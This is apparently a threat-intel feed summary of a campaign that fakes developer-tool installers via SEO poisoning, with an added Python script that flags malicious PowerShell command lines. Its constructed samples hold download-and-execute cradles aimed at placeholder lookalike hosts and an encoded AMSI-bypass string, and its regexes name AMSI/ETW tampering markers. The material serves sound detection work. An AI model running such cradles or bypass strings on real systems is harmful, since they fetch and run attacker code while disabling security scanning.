Hackers Use SEO Poisoning to Fake Gemini CLI and Claude Code Installers
ID: dbf3bb8c-8ad8-55fc-98d7-4960f9c964a1
STIX ID: report--dbf3bb8c-8ad8-55fc-98d7-4960f9c964a1
Feed Name: GBHackers
A financially motivated campaign observed in March 2026 poisons search results for developer tools (Gemini CLI, Claude Code and Node.js among them) so that typosquatted domains hosting fake installation pages rank above the genuine download sites. Each page instructs the visitor to paste a PowerShell command into a console; running it fetches and executes, in memory, a heavily obfuscated, fileless infostealer that disables ETW and AMSI, harvests browser credentials, tokens, SSH keys and collaboration and cloud data, and exfiltrates them to attacker-controlled servers. To keep the victim from noticing, the loader also installs the legitimate tool in parallel. The operation rotates across many spoofed domains on bulletproof hosting; the report lists over 30 related domains and numerous SHA-256 hashes as indicators of compromise.
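The chain above leaves two things in PowerShell command-line telemetry a defender can key on without any of the report's specific indicators: a download-and-execute cradle (iex plus irm/iwr/WebClient, possibly hidden in -EncodedCommand) pointing at a host that merely resembles a legitimate developer-tool domain, and AMSI/ETW tampering strings in the decoded script. The triage script below is an added example, not code from the GBHackers report or the campaign; the allowlist of legitimate hosts, the indicator regexes and the scoring weights are the author's assumptions, and the sample command lines are constructed, with placeholder domains on the reserved .example TLD rather than real IOCs.

```python
"""Triage PowerShell command lines for the fake-installer pattern.

Added example (not from the report). KNOWN_GOOD, the regexes and the weights
are assumptions; SAMPLES are constructed, with .example placeholder domains.
"""
import base64
import re
from urllib.parse import urlparse

# Assumed defender-maintained allowlist of real download/registry hosts for
# the tools the report names. Not provided by the report.
KNOWN_GOOD = ["nodejs.org", "github.com", "npmjs.com", "anthropic.com", "claude.ai"]

CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b"
    r"|net\.webclient",
    re.I,
)
# Strings commonly present in scripts that patch out AMSI scanning or ETW logging.
TAMPER_RE = re.compile(r"amsiinitfailed|amsiscanbuffer|amsiutils|amsicontext|etweventwrite", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(cmd: str) -> str:
    """Append the decoded form of a -EncodedCommand payload (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return f"{cmd} {decoded}"


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch near-miss second-level labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str) -> str:
    """known-good, 'lookalike of <domain>', or 'unknown host'."""
    host = host.lower()
    if host in KNOWN_GOOD or any(host.endswith("." + g) for g in KNOWN_GOOD):
        return "known-good"
    labels = host.split(".")
    sld = labels[-2] if len(labels) >= 2 else host
    for good in KNOWN_GOOD:
        # brand used as a subdomain prefix (nodejs.org.example) or a one-edit
        # second-level label (node-js.example, claude.example)
        if host.startswith(good + ".") or edit_distance(sld, good.split(".")[0]) <= 1:
            return f"lookalike of {good}"
    return "unknown host"


def triage(cmd: str) -> dict:
    """Score one command line; 'suspicious' means score >= 2 (assumed threshold)."""
    text = expand_encoded(cmd)
    findings, score = [], 0
    if CRADLE_RE.search(text) and FETCH_RE.search(text):
        findings.append("download-and-execute cradle")
        score += 2
    if TAMPER_RE.search(text):
        findings.append("AMSI/ETW tampering strings")
        score += 3
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        verdict = classify_host(host)
        if verdict.startswith("lookalike"):
            findings.append(f"{verdict}: {host}")
            score += 2
        elif verdict == "unknown host":
            findings.append(f"unknown host: {host}")
            score += 1
    return {"score": score, "findings": findings, "suspicious": score >= 2}


# Constructed sample command lines (as seen in PowerShell 4104 or Sysmon 1 events).
ENCODED = base64.b64encode(
    "$s='amsiInitFailed'; iex (irm https://nodejs.org.example/setup.ps1)".encode("utf-16-le")
).decode()
SAMPLES = {
    "legit": 'powershell -c "Invoke-WebRequest https://nodejs.org/dist/index.json -OutFile index.json"',
    "fake_installer": 'powershell -nop -w hidden -c "iex (irm https://node-js.example/install.ps1)"',
    "encoded_bypass": f"powershell -nop -enc {ENCODED}",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, triage(line))
```

The allowlist check runs before the lookalike check so that real subdomains such as api.github.com are never flagged; the lookalike check deliberately fires on an exact brand label under a different TLD (claude.example), since that is the cheapest typosquat to register. Tune the weights to your environment, but keep the tampering-string weight high: there is no legitimate reason for an installer script to reference AmsiScanBuffer or EtwEventWrite.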
